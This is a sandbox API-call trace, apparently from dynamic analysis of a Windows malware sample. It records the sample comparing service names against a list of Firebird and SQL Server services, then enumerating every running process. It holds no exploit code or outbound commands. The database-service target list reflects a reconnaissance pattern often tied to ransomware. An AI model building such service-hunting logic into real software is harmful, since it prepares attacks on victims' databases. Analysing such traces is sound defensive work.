[0209.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0209.511] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0209.511] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0209.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0209.511] lstrlenW (lpString="SENS") returned 4 [0209.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0209.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0209.511] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0209.511] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0209.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0209.511] lstrlenW (lpString="ShellHWDetection") returned 16 [0209.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0209.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0209.512] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0209.512] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0209.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0209.512] lstrlenW (lpString="Spooler") returned 7 [0209.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0209.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0209.512] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0209.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0209.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0209.512] lstrlenW (lpString="sppsvc") returned 6 [0209.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0209.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0209.512] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0209.512] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0209.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0209.512] lstrlenW (lpString="SSDPSRV") returned 7 [0209.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0209.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0209.512] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0209.512] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0209.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x424 [0209.775] Process32FirstW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.776] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.777] lstrlenW (lpString="System") returned 6 [0209.777] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.778] lstrlenW (lpString="smss.exe") returned 8 [0209.778] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.779] lstrlenW (lpString="csrss.exe") returned 9 [0209.779] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.780] lstrlenW (lpString="wininit.exe") returned 11 [0209.780] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.781] lstrlenW (lpString="csrss.exe") returned 9 [0209.781] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.782] lstrlenW (lpString="winlogon.exe") returned 12 [0209.782] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.783] lstrlenW (lpString="services.exe") returned 12 [0209.783] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.784] lstrlenW (lpString="lsass.exe") returned 9 [0209.784] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.785] lstrlenW (lpString="svchost.exe") returned 11 [0209.785] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0209.786] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0209.786] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0209.787] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0209.787] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.788] lstrlenW (lpString="svchost.exe") returned 11 [0209.788] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.789] lstrlenW (lpString="dwm.exe") returned 7 [0209.790] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.790] lstrlenW (lpString="svchost.exe") returned 11 [0209.791] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.791] lstrlenW (lpString="svchost.exe") returned 11 [0209.792] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.792] lstrlenW (lpString="svchost.exe") returned 11 [0209.793] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.793] lstrlenW (lpString="svchost.exe") returned 11 [0209.793] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.794] lstrlenW (lpString="svchost.exe") returned 11 [0209.794] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.795] lstrlenW (lpString="svchost.exe") returned 11 [0209.795] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.796] lstrlenW (lpString="svchost.exe") returned 11 [0209.796] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.796] lstrlenW (lpString="svchost.exe") returned 11 [0209.796] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.797] lstrlenW (lpString="svchost.exe") returned 11 [0209.797] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.798] lstrlenW (lpString="spoolsv.exe") returned 11 [0209.798] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.798] lstrlenW (lpString="svchost.exe") returned 11 [0209.799] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.799] lstrlenW (lpString="svchost.exe") returned 11 [0209.799] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.800] lstrlenW (lpString="audiodg.exe") returned 11 [0209.800] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0209.801] lstrlenW (lpString="sihost.exe") returned 10 [0209.801] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.801] lstrlenW (lpString="svchost.exe") returned 11 [0209.801] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0209.802] lstrlenW (lpString="taskhostw.exe") returned 13 [0209.802] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.803] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0209.803] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0209.804] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0209.804] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.804] lstrlenW (lpString="explorer.exe") returned 12 [0209.804] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0209.807] lstrlenW (lpString="Memory Compression") returned 18 [0209.807] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0209.808] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0209.808] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0209.808] lstrlenW (lpString="SearchUI.exe") returned 12 [0209.808] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0209.809] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0209.809] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.810] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0209.810] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0209.811] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0209.811] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0209.812] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0209.812] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0209.813] lstrlenW (lpString="conhost.exe") returned 11 [0209.813] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0209.814] lstrlenW (lpString="roof competitive.exe") returned 20 [0209.814] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0209.815] lstrlenW (lpString="trustees.exe") returned 12 [0209.815] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0209.816] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0209.816] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0209.817] lstrlenW (lpString="isbn.exe") returned 8 [0209.817] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0209.821] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0209.821] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0209.822] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0209.822] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0209.823] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0209.823] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0209.824] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0209.824] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0209.825] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0209.825] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0209.826] lstrlenW (lpString="playstation iraq.exe") returned 20 [0209.826] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0209.827] lstrlenW (lpString="harbor.exe") returned 10 [0209.827] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0209.828] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0209.828] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0209.829] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0209.829] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0209.830] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0209.830] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0209.832] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0209.832] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0209.833] lstrlenW (lpString="larent.exe") returned 10 [0209.833] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0209.834] lstrlenW (lpString="stereo.exe") returned 10 [0209.834] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0209.834] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0209.834] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0209.835] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0209.835] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0209.836] lstrlenW (lpString="state.exe") returned 9 [0209.836] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0209.837] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0209.837] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.838] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0209.838] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0209.839] lstrlenW (lpString="taskhostw.exe") returned 13 [0209.839] 